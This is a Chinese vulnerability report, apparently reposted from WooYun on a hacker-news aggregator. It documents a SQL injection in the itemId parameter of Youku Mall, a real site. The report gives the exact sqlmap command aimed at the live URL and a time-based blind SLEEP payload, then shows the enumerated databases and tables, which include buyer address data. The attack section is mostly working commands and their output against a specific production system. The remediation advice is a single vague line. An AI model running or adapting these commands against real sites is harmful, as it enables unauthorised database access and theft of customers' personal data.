记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

优酷商城存在SQL注入漏洞一枚可读库

2015-10-21 01:10

优酷商城优酷土豆路由宝页面存在sql注入漏洞

地址:http://mall.youku.com/itemdetail/item/itemDetail.action?itemId=6589701773214092189



使用sqlmap神器进行测试

code 区域
sqlmap.py -u "http://mall.youku.com/itemdetail/item/itemDetail.action?itemId=6589701773214092189" --random-agent --time-sec 2 -D mall --tables

漏洞证明:

code 区域
Parameter: itemId (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: itemId=6589701773214092189) AND (SELECT * FROM (SELECT(SLEEP(5)))jmNX) AND (9905=9905

---

back-end DBMS: MySQL 5.0.12

available databases [2]:

[*] information_schema

[*] mall





code 区域
Database: mall

[14 tables]

+----------------------------------+

| MALL_AREA_INFO |

| MALL_BUYER_ADDRESS |

| MALL_BUYER_CORE |

| MALL_BUYER_DETAIL |

| MALL_BUYER_STATUS |

| MALL_BUYER_WULIU |

| MALL_CATEGORY_CORE |

| MALL_CATEGORY_DETAIL |

| MALL_CATEGORY_STATUS |

| MALL_CENTER_AUTHORIZATION_DEFINE |

| MALL_CENTER_CHANNEL_CONFIG |

| MALL_CENTER_COMMON_OPERATE_LOG |

| MALL_CENTER_FUNCTION |

| MALL_CENTER_aRE |

+----------------------------------+





修复方案:

增加过滤。

知识来源: www.wooyun.org/bugs/wooyun-2015-0139116

阅读:74093 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“优酷商城存在SQL注入漏洞一枚可读库”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云